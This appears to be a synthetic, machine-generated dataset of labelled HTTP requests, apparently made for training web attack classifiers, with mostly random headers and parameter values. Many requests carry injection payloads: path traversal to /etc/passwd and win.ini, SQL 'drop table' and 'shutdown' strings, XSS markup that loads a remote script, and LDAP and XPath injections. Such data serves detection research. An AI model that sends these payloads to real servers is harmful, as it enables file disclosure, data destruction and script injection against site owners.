Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: Digest username="hxdms"
Range: 36-,-7
Referer: /sZoeHtn/klaele.asmx
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (compatible; MSIE 1.4; Win98; hf6aboNtiM)
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 223x382
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 815 33.130.52.25 "gsi87idmefa9" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

aj8ref=)  ( |    (   cn=*o   'brien*  )(mail    =*o  'brien*)   

End - Id: 37575
Start - Id: 45746
class: PathTransversal
GET /_body0inputSKZS7TXps4bvar/tadsCt/oq/aibvPro@t1K0i@/plrbsbqsei2nphIu/LKR5-kgroup byU/rj@KG/uateohzeilo/a@6xF5ApA.sKmTS8kce/wtoVObTl/uebeenkdeXkoenst.php3?ir6sjisgd=ea%40&lntir=%5DseTctaeUi&hpUwtaic=htpasstoOl&ci=mc%29%28&pl=tmpel0o&GcmHRQWg8=ltt8ann&tB=6&ndnsEOmdeSnweey=weudbppsthgdnfln&vjootedrt=7611013844&eaxsxoyre=niisxopene&eiE=5694883&8styleiYw0ZynRoe=8&xhrrNiusthhe=e%3A%5C%5CWINNT%5C%5Cwin.ini&rfnnagT14y=2&DsHnrprcrclach=na+ HTTP/1.1
Host: 195.79.183.227
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.2, utf-8, euc-cn, us-ascii
Accept-Encoding: gzip;q=0.7, identity, identity;q=0.8, deflate, gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 52.102.188.198
Cookie: swioeoneter=ntaoEms;ir0=ns3Ru:nthH;bnuest2ceemfta=uesnektle9;gO=1
Cookie2: $Version="34"
Date: Sun, 23 Aug 09 07:23:26 GMT
ETag: "@sm4d6_EmJB2BlXXqg7"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Mon, 04 Feb 08 10:20:21 UTC
If-Unmodified-Since: Fri, 24 Feb 06 17:54:29 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: *
If-Range: Tue, 07 Aug 07 16:17:58 GMT
Max-Forwards: 78
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: wptoa ypehsb8=2pbhrh0a
Authorization: NTLM dHJudWdOZGlIbGNwaW5ic0RlaGRobmtzbnhkbG9pcmMxb21laWlUZWxodGt0
Range: -500252,934-3694
Referer: /eunt/neuxrjn/oddake.gif
TE: gzip;q=0.5,deflate;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 0.7; nl-m3; rv:8.1.1) Gecko/39061622
UA-CPU: StrongARM
UA-Disp: 2913,125,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/1.9 www.Ossa.png
Transfer-Encoding: 3Epmo
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 665 www.fiYe23m4.htm:79508 "hman" "Fri, 20 Oct 06 22:19:29 UTC"
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45746
Start - Id: 41826
class: SqlInjection
GET /ombnre0krl/.lxZlwCXo/dul1Bwrg85epCdkmafd/wskedfer05awtptvcaE/VR5Vyj/QselectbetweenPyW-K5j_a/shE4v_Bs0JW/rViFPuQKEx5EXz68t/akeVaKKQK21-/roRohCqgru64Xnx@R.css?lvonri24=88241448&rg=Mosock_streamvr&9iraoe=diImromomI&Yi0tm4JEiOsi6=8217903&XNpy8Z14fOF2=ithtpassenetcat&ahs=c2enhttpsesbt&ntatld7i=45652330&i4ePeDuseez=uees&teIenodneemads=e%40%3A6C&.gNEMM=%27%3B+++drop++++table++++admin&sa=qX9mkjE&d4=unaE9uoena&vdtcesuh=e&lteWeMoyriytnee=068832&sj9oixt6ysnh=8iAyouO2oiuvild HTTP/1.1
Host: www.hhq3bM.fr
Connection: close
Accept: application/rtf, application/*, text/plain
Accept-Charset: x-mac-hebrew;q=0.4
Accept-Encoding: deflate, identity, compress
Accept-Language: okylfM0-bqyti2g, eco9rn5-mlb1ste;q=0.6
Cache-Control: tydmi='smxb6G'
Client-ip: 200.70.15.74
Cookie: npdn=rlbn;htosr2niP=073824882;poeza=> ib;Fb=8;YCfromwDzOS8nw=Se
Cookie2: $Version="5"
Date: Sat, 23 Apr 05 09:55:07 CET
ETag: "ba6@9N37PLSKTNy"
Expect: jao4e=iser
From: onirdzsS@rcotthemoE.gov
If-Modified-Since: Thu, 06 May 04 09:42:23 GMT
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: Sat, 10 Mar 07 15:52:45 CET
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: aRdtao dotenhA=tIetgde
Range: -0842
Referer: /cEcAa.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.8 (X11; U; Linux i386 8.7; ve-oe; rv:8.7.8) Gecko/53420212
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: howg0r/2.1, n5ai7/3.4, 4bnu/8.0, 5mO/2.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41826
Start - Id: 46246
class: PathTransversal
GET /wee0jsTphoenmtS/htRkirctota7ue.php4?iANes=qrBuIgbM2sX&xdWM9W6=31956882&dv=nbFG_FtGN9c&omos=%2Fetc%2Fpasswd&EPLk=v%40bwcN&rmmeie=t98dJm59m&tlaes=a+gws&@AU5Ex=6&NxAhioufehspho=at6%3A1&tt=t%27iSz%7Cpelocation%3DTb&ToheRtlnmai=6 HTTP/1.0
Host: www.seaamgyNt.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 231.150.7.86
Cookie: gnewsaljo8hvp=dtstThN8jceNiz;Coile=0875961;iisiyu1o4Doal=e;8ne2=e|y3tobjectjphp at>hspe;yitO3ddeen8et3=d4e
Cookie2: $Version="79"
Date: Mon, 20 Dec 04 17:13:58 UTC
ETag: W/"fLQGgG09qDexQXkz8XW"
Expect: 100-continue
From: e4ia@iiZbne.de
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 07 Jan 09 21:47:35 CET
If-Match: "Zuy8K9dKF00iPR4LTkY"
If-None-Match: *
If-Range: Mon, 06 Jun 05 19:30:24 UTC
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Digest response="26B00B3BF99F6f41CaF237Baa34fD98D"
Range: 5263-
Referer: /ila2niH/eou4rsaa.msf
TE: deflate;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: ePEWrOqy http://www.w8jsT.be
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0134x6320
Via: 4.1 www.sptEir.js, 4.5 77.232.19.117
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 532570333
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46246
Start - Id: 46169
class: PathTransversal
GET /6WRj8BlW5M.cfm?liasnuryemOkEtL=480227&s1eoooisimsrfa=libO&esswtuofN28s1ys=hdA3ia+vbEcpt+&odeashthrelcm=oaW+A+&fnte=ceytehrioiBmerijT&eEG=ithhitqef&eadsEuemlb0=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: 101.187.221.51:80
Connection: nteio1
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.7, gzip
Accept-Language: lilw-s, ien3ltp-dma2, n4nwt-ta8ik, nh-Fntrdeee, rers-rX1KTf;q=0.5
Cache-Control: min-fresh=2
Client-ip: 52.114.67.108
Cookie: ysht=ue;enycdvosodison0=901902067;e0heoceuxZg=rebn;uh3rxIe5iPr=dtrpsfazsxhuniono];innchi4o=ean1lboot.inioeta;go1uaIlsu5=23722
Cookie2: $Version="88"
Date: Sat, 05 Aug 06 13:37:53 UTC
ETag: "XxIGPTgMgE9f0ZK"
Expect: 4pnWf5e
From: Dilvo9h@ht8heE6li.fr
If-Modified-Since: Sun, 25 Sep 05 22:03:52 CET
If-Unmodified-Since: Thu, 01 Jul 04 06:11:24 UTC
If-Match: *
If-None-Match: "WUnAuIfWy3tT8xNVC"
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 57
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: aofr fhssn=atea
Authorization: Digest username="nId1rsoO"
Range: -51066
Referer: http://aetMrt.uk/mho1reRT/oa1ra/sdFu.cfm
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: ialwsrms9auvuTs
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.9 63.96.226.125
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46169
Start - Id: 45907
class: PathTransversal
GET /sDQRdwG8u8/rIN@T3and/isYWm9tyel2gurneo/ttblV-HwniQtfPlBy/kyafie4ensttnHqyao/txaowVCQYn65BjFS3/o9OrS4PpLv.bin?ohnldneDatN=%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.satCt.net:4
Connection: nstmAoh
Accept: text/html;q=0.3
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-6;q=0.3
Accept-Encoding: *
Accept-Language: jR1tnmp5-8n7o, TfnREtli-krirdia7, w5tT-e;q=0.9
Cache-Control: pw='sui'
Client-ip: 132.53.138.134
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Fri, 22 Dec 06 20:53:51 GMT
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 19 Mar 08 15:43:36 GMT
If-Unmodified-Since: Wed, 06 Apr 05 14:50:07 GMT
If-Match: *
If-None-Match: "EFZSVR096uCoBXqXt"
If-Range: "X8J4ERrpEUMiL8D"
Max-Forwards: 41
MIME-Version: 1.5
Pragma: of=a
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic N2loYWVudDo2aW5q
Range: 2-4458,00-
Referer: http://www.o0ue.gov/creac1/qjettr.pdf
TE: trailers,deflate
Trailer: If-Range
User-Agent: ajehreae/5.9.9
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/1.2 www.sasinhH.gif, 4.9 18.220.230.13, HTTP/6.0 43.247.58.168
Transfer-Encoding: deflate
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7456585947858
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45907
Start - Id: 35128
class: SqlInjection
POST /RQtrFjydropBM/nLsxxI/ewqbLoYbJPnx0R/sneesk/rGiMb-stleVTH8tdEla/gJwcRQiv0vC/eFk@ZVxpgF1mhgYepLw/Df5extaspnutn4oafm9.pl? HTTP/1.0
Content-Length: 146
Content-Language: 4i,sxl1a1,gstpech
Content-Encoding: identity
Content-Location: /lrroa/tsNwo/Amja/rediad/lGlrs.shtml
Content-MD5: ZTJobDRjZUV0bmlldGE2bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Feb 04 10:39:52 UTC
Last-Modified: Tue, 03 Oct 06 22:30:38 UTC
Host: www.gfZirnert5.uk
Connection: close
Accept: */*
Accept-Charset: windows-1257, euc-tw, windows-874;q=0.4, iso-10646-ucs-2, us-ascii;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: yjLa=y
Client-ip: 86.214.16.25
Cookie: n2p=4nnnEtkh8owmmEtnx;es=y3l/-e$1ctcvarel;eqQ_-F=b6BiL;nvwp5c=8<etc
Cookie2: $Version="43"
Date: Thu, 04 Sep 08 15:29:46 GMT
ETag: "wECWPXUQhi-PB9N"
Expect: 100-continue
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Tue, 08 Apr 08 12:03:22 CET
Max-Forwards: 4
MIME-Version: 6.8
Pragma: e='ftji'
Proxy-Authorization: Digest cnonce="cejy"
Authorization: Digest realm
Range: 9644-,893-04607,798896-
Referer: /toe4/s3QxonI.txt
TE: trailers,trailers,deflate
User-Agent: Mozilla/7.4 (compatible; edStaoRAl8; Linux i586; adMan; telinmeo; Bpwdim)
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 6edt/8.1 41.85.213.179, ycee/9.6 www.sisy.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t0=;     EXEC( 'INS'+'ERT INTO users   values(17,'ylln','loy'  ))&h01ioY=rplnhimle&taesfnloe=somoinr&rdoOmgh=6986332

End - Id: 35128
Start - Id: 46963
class: XSS
PUT /hxFVXnvD_/r_/r8nepjhFha4wehChnrmt/wl6siee1lttte/jojS/a0f8syUkJCyhA/hAzPkf57N2rtJG/8O84Q5c/8fmsee/sdienygiFibenibnr/pratsze.shtml? HTTP/1.0
Content-Length: 344
Content-Language: nuiwiao,ugsene
Content-Encoding: identity
Content-Location: http://www.eu1gdb.st/inytqCsz/eowEhv/rIbenoDs/htyhcf.html
Content-MD5: YTdvdGZobzl0b2xodDJlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Mar 05 21:31:06 UTC
Last-Modified: Mon, 30 Nov 09 19:27:56 CET
Host: www.eenljrcrre.com
Connection: ielos
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: eut-tHfto, Rq-hfae, ezauvtdh-v4r, p-3ae9e6a0;q=0.6, uut-yvr;q=0.0
Cache-Control: min-fresh=65336
Client-ip: 248.152.241.195
Cookie: onelna0qRaaxh2=475197;thtSSu4taw=me;fseseiasOh8s=8yt|m
Cookie2: $Version="609"
Date: Wed, 20 Sep 06 11:23:36 UTC
ETag: "6g5uOF.cJy1pW@7l6"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Tue, 19 Jan 10 19:55:27 UTC
If-Unmodified-Since: Fri, 22 Aug 08 06:33:22 CET
If-Match: *
If-None-Match: "adlZDISFzsbWRSS9j."
If-Range: Tue, 06 Jun 06 19:00:08 UTC
Max-Forwards: 7
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ff89aaf3
Authorization: NTLM cmlycm1pd3N5bGJ6ZFM4S3NkZzBwaGJpbmFlZWlhaW1udGVkYW9lbmlm
Range: 7-,-974,384-64
Referer: http://www.3hmr.ch/psk4hed/3csFE/i6be/ofmsem.pl
TE: trailers
Trailer: Expect
User-Agent: ioAsRi0ut (tOiXExCcg; ruDvivg; tZGM_HY; hKunYv; e2lxP8KIJ_)
UA-CPU: 68000
UA-Disp: 698,9133,32
UA-OS: Solaris
UA-Color: color16
Via: 6.3 www.ghloclth.shtml:49, 0.3 149.218.254.216:0449, HTTP/1.5 www.chiC.jpeg
Transfer-Encoding: identity
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

othsdos=i8oE4S2HC&oidLLouI1e93=n1ynE_r&ne4wg=3249831&iu=ilocyttom26qiwyeo&rcgdSn=<style  type    =" text/javascript    ">[alert   ('anrzitasA');]</style>&rjspy=64449948&ooo=tu_Jl0e2eFT&em5e1socmebsefi=Rwetonilpnaagedd&ltefu7=921&SC.Qw4m2=arl&isi0=cehlnngsh5hlft9&vsneeerEirose=tv\httpamzESusPm2e&9Teeyvy=r1FSbz

End - Id: 46963
Start - Id: 45363
class: PathTransversal
POST /rnBnhnadtjt0rw.cfm? HTTP/1.1
Content-Length: 224
Content-Language: zoaptlHT,d
Content-Encoding: identity
Content-Location: http://kndq.biz/ob8s/84inw/3hmn.swf
Content-MD5: cWhHY3R5aWRlbW9iYzRlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Sep 04 20:14:25 GMT
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: 126.105.37.98
Connection: 3rSh
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, windows-1255, euc-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 76.203.238.234
Cookie: eL8boot.inin=3;Dale= aobjectrr;raueiews5uglu=mrwch;sryteita=iuorchem5
Cookie2: $Version="0"
Date: Thu, 13 Mar 08 03:45:50 UTC
ETag: "tOSrx8eJa@kprlW9"
Expect: 100-continue
If-Modified-Since: Sun, 16 Sep 07 19:46:32 UTC
If-Unmodified-Since: Fri, 15 Oct 04 17:02:01 UTC
If-Match: "zqionbVhV8KuSykbRqOK"
If-None-Match: "xKe7vNp18q9iB1QsC2j"
If-Range: Fri, 16 May 08 06:20:33 GMT
Max-Forwards: 7
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic SWN1bnR0OmR0YWlpZGU=
Authorization: NTLM dW41NXJjaVRlcmVpVGNidGhhN25FcHNsbnRvaWh3aWluZGV6M3NvZQ==
Range: 53-,6570-433377,-5771
Referer: /ispoces0/cskTvr/ersnixoo.gif
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: depg5r1 (tQiZiOUE; rrO4ODL; lpOCMmWd; mLUmWJ; ecXUGxoY)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 441x030
Via: 4.2 80.132.73.161:03802, FTP/5.3 169.59.183.25
Transfer-Encoding: gzip
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hie=nygeo2 g&aqso<'E1ee&vo=5727183&tdtsDrrr0g4=ebcMez_AZ&p7hjoee=binQqhmuii0d26rhd&icwnadoe=f:\autoexec.bat&4knLJjA3=mDTLleN&SBLbKZAeS.jr=fweIaN&XRa2TdNd0C=ghcUKM&anm0eco2S9=oPl8zi&xasI=teitS&QOqD8id.=iframeMamoern

End - Id: 45363
Start - Id: 38200
class: LdapInjection
GET /ttitnan/dscpclq/7zjuclrD/HA9cBuimgTk0ql8t/sjb5ylJppq4x/mionam/a2.-Rl722YG7xW9j-sJP/grm_r7SW87IcpOA77TR/7hlsa5iojbaoYrAtY/eQXh6UgTD@5so.bin?esnlsn=f%27ga4xea2%2B%7Eh+nson&sssnEwnejnst8=bmiDl%29%28++++%7C+%28mwi%3D*%29 HTTP/1.0
Host: 137.107.104.14
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: big5
Accept-Encoding: compress, gzip, gzip;q=0.9
Accept-Language: 8y-rspnteea, bpj-44, shgxtrua-e3nvStb
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="7"
Date: Mon, 16 Oct 06 10:01:18 CET
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Wed, 08 Sep 04 22:27:57 GMT
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: "sgYPmtUVQ6N2-Bg"
If-None-Match: "JMxoNj_owNG5dq-IhQmC"
If-Range: Tue, 31 May 05 23:12:01 GMT
Max-Forwards: 057
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: NTLM b25oZGJ1c3Nib3lnYWE1dGlzb3Jvc3dvdWV1Z3RkYXNzdHRrb3Jv
Range: 83-68
Referer: http://kil6k5ii.uk/Ihnr/sdMx/nh4e0s/Tzwdtnh/n9myernl.bin
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: t5sArjgxQt/9.2.7
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: 5.9 248.205.182.57
Transfer-Encoding: identity
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38200
Start - Id: 48352
class: XPathInjection
GET /lcentkaeinsskst/lhul3/urT/edt/mr/mwasaArldwix/ok/undstmtdt/iar0Nb84/aslsseTtaos7ezh6/te9RO0ICbXUJi7.mspx? HTTP/1.0
Host: 79.238.15.36
Connection: close
Accept: application/*
Accept-Charset: hz-gb-2312, iso-8859-2
Accept-Encoding: *
Accept-Language: 7saibn']     |  P  |   //user[ name/text()   =    'Ece
Cache-Control: min-fresh=15215
Client-ip: 89.227.169.249
Cookie: fpnhsUnEmir=shtNi(
Cookie2: $Version="4"
Date: Fri, 22 May 09 09:27:26 GMT
ETag: "FJnd@gDFrU9vaMIl"
Expect: 5kOh80fg
From: aloit2ef@imcvhU.st
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "_H1Lt2uFcWJ5mcELY7a"
If-None-Match: "YljhjA4_bsutmLl"
If-Range: *
Max-Forwards: 9024
MIME-Version: 4.9
Pragma: ene4dtcO='m8os'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: Basic czE3cHRsOmVzcG8=
Range: -579124,02412-
Referer: http://www.yosiqoaT.be/do9sr/yett/tdzb/jtsuiioc.mspx
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: ewslcwi
UA-Color: color32
UA-Pixels: 784x5970
Via: 1.0 www.ew5jhn.png, 8.8 www.iet6.htm, 6.2 79.65.180.171:97
Transfer-Encoding: deflate
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48352
Start - Id: 35514
class: XPathInjection
GET /khohkasd/nbTQ85LRbW/ophasta0k8ebDmutn/ume0cpao/HRbmwL/e2.2teWY1@wkvH3/hae.jpg?qwe1l=6childluselectl5tbo&wish=91768821&h24h37M6t6mb=2RclWethdte2tit&omtlvyyE=ojatr&poez=ceormb1Nsotl&nteuottdcs=04268148&yeo3rayrsoay4em=29315&g9t8=772910 HTTP/1.0
Host: www.0iBtEesep.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: pnrxo2ud-unoor, A0u-teecr;q=0.5, adoo-g;q=0.0
Cache-Control: r='mmxbe'
Cookie: MRdocumentTm6ENM=rdeal;Rf0ttouajdr=72   or  1<     4/9tyehr/kcyn/child::text()[position()=774] or   071='] | /* | /foo[bar='
Cookie2: $Version="6"
Date: Wed, 25 Jun 08 12:40:31 GMT
ETag: W/"9ObI_Vie__EQdPDdfGCr"
Expect: buhh=hcwtarst
From: iouti@ltH9gaz.net
If-Unmodified-Since: Thu, 08 Sep 05 23:53:48 CET
If-None-Match: "rB-kV8w1bBEnjV8oBcEx"
Max-Forwards: 9832
MIME-Version: 5.5
Pragma: a3rwvyn='eob9'
Proxy-Authorization: Basic Z2hkZ3dudGE6NWRlcg==
Referer: /iiteo7s/artien/nntdcpsi.fgf
TE: chunked;q=0.6,chunked
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 6.9; ea-ir; rv:1.6.0) Gecko/39576095
UA-Pixels: 5408x588
Via: 9.1 www.r3ta.js:1800, 6.1 228.201.56.120, FTP/4.5 www.meidrsih.html
Transfer-Encoding: 0iLKb; truion=7psttatw
Warning: 080 86.96.141.124 "dzsTNenlFnert" 

null

End - Id: 35514
Start - Id: 42265
class: SqlInjection
GET /d0uV6AP6gUzle_telnet/slog.acceptpasswdtR/sEeY_Rep1iCoVeYizIY/t1r6woewtedd/h2B_3u.YKTZJB/v0Iboot.inippd.bin?gbRottbT=%27%3B+++++shutdown-- HTTP/1.0
Host: 172.173.241.243
Connection: yalii
Accept: audio/basic;q=0.1, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=5524
Client-ip: 17.168.241.104
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="38"
Date: Tue, 30 Mar 04 10:45:19 GMT
ETag: "iATM55F0tdxmn3EF.d6"
Expect: 100-continue
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 10 Apr 07 07:54:03 CET
If-Unmodified-Since: Mon, 12 Jul 04 13:53:34 GMT
If-Match: "aiSBH@S0.kGtuducVGM"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: Fri, 13 Aug 04 17:33:19 GMT
Max-Forwards: 1
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: tofgh dqar=hn2s
Range: 996351-59792
Referer: /cQsirae.js
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 0.3; s4-oo; rv:9.1.0) Gecko/26518613
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4514x198
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 519 207.75.126.193 "hsko3mn" "Wed, 24 Oct 07 13:29:54 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42265
Start - Id: 47112
class: XSS
GET /intibt7oeoijqigmdi/tDpU1ojXHa6i8r/nurG1snVyeowtomane/Esllo75CIdots9e/tZcBYEYI_Y/rG/eLbWtbenesjdo.htm?lsfiiwsUmrlb=4129&t4ftlso=23719467&dtHh=Maidit%3CsT&tdpu=nndd&uylueip15msr=42&NfobL=m%24i1ls%5Cfstprocessing-instructione%3Ee&tioent=tilpCpenezhftz&ia=%3Cdiv++++style+%3D++%22++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.leta.com%2Fscript%2F6rysoekj.cfm%5D%29%3B+++%22+%3E&etlisfplgTohst=dODk2jlwf%40_Z&document1ah=aphbamabsnrRh HTTP/1.1
Host: 11.232.235.113:80
Connection: close
Accept: application/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 202.63.51.90
Cookie: Zdirebono=94;rb= exl3ahad;rs=y0_;onig=1_xnxM;idRejqs=374554;5wieInLzfyotd=hninclude&5etc(lyt;tg+nr
Cookie2: $Version="3"
Date: Fri, 22 Apr 05 13:05:01 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
